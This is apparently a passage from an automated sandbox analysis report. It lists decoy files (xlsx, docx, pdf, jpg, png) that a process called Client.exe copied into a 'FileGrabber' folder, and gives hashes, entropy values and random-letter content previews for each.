Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Desktop\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\134349\FileGrabber\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Desktop\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\ProgramData\134349\FileGrabber\Desktop\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFM